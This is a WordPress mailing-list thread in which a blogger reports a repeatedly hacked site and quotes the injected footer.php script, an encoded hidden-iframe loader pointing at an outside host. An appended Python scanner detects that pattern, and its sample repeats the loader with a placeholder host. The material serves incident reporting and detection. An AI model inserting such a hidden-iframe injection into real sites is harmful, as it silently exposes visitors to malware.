[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Mladen Adamovic mladen.adamovic at gmail.com
Sun Oct 31 16:50:06 UTC 2010


Regarding hosting - I have other websites hosted at my Dreamhost account and
they haven't been hacked so far. That's good, otherwise I'd have
days of work to fix it.

GoDaddy has a slow and unresponsive panel compared to Dreamhost - I have some
websites hosted there as well.

I understand that some individuals and companies are offering WordPress
hosting; however, for me Blogger could do - and it's free. Since my blog has
around 25 readers, I don't have economic reasons to pay for managed
WordPress hosting.

Regards



On Sun, Oct 31, 2010 at 4:17 PM, Vid Luther <vid at zippykid.com> wrote:

> Mladen,
>  Instead of switching platforms completely, I would recommend first
> changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
> wpengine, my company, or even godaddy.. their UI sucks, but their phone
> support is fairly decent.
>
> As for the exploit, it may not be a wordpress exploit, but an ftp
> attack, as it's just looking for filesystem paths and injecting to it.
>
> I'm assuming by default theme footer, you meant twentyten theme, and
> footer.php ?
>
>
>
> Mladen Adamovic wrote:
> > Hi guys,
> >
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> >
> > I don't know which exploit it did use and couldn't identify it, but it was
> > adding the following code to my default theme footer.php:
> >
> > <script>
> > enc = "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> >
> > I think I'll have to migrate to Blogger, since I couldn't identify exploit
> > it did use.
> >
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
>
> --
> Vid Luther
> Founder
> ZippyKid
> http://zippykid.com/
> 210-789-0369
>
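
Added example, not part of the original thread: a small Python check that a site owner could run over theme files to flag the pattern quoted above, a percent-encoded string literal that decodes to a 0 or 1 pixel iframe. The function name, the sample footer and the `example.invalid` placeholder host are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Single-line quoted string literals that contain at least one %XX escape.
ENCODED_LITERAL = re.compile(r"""(["'])((?:(?!\1).)*%[0-9A-Fa-f]{2}(?:(?!\1).)*)\1""")
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ATTR = re.compile(r"""\b(width|height|src)\s*=\s*["']?([^"'\s>]+)""", re.I)


def find_hidden_iframes(source):
    """Return [(line_no, src)] for percent-encoded iframes 0 or 1 pixel in size."""
    findings = []
    for m in ENCODED_LITERAL.finditer(source):
        decoded = unquote(m.group(2))  # same result as JavaScript unescape() for %XX
        for tag in IFRAME.findall(decoded):
            attrs = {k.lower(): v for k, v in ATTR.findall(tag)}
            tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
            if tiny:
                line_no = source.count("\n", 0, m.start()) + 1
                findings.append((line_no, attrs.get("src", "")))
    return findings


# Constructed sample modelled on the snippet in the quoted message;
# example.invalid is a placeholder host, not an indicator from the thread.
SAMPLE_FOOTER = """<div id="footer">
<?php wp_footer(); ?>
<script>var q = "hello%20world";</script>
<script>
enc = "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//example.invalid/x.php%27%3E%3C/iframe%3E";
dec = unescape(enc);
document.write(dec);
</script>
</div>
"""

if __name__ == "__main__":
    for line_no, src in find_hidden_iframes(SAMPLE_FOOTER):
        print(f"footer.php:{line_no}: hidden iframe loading {src}")
```

A hit only shows where content was injected. It does not show how the file was written, so credentials and file permissions still need review.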

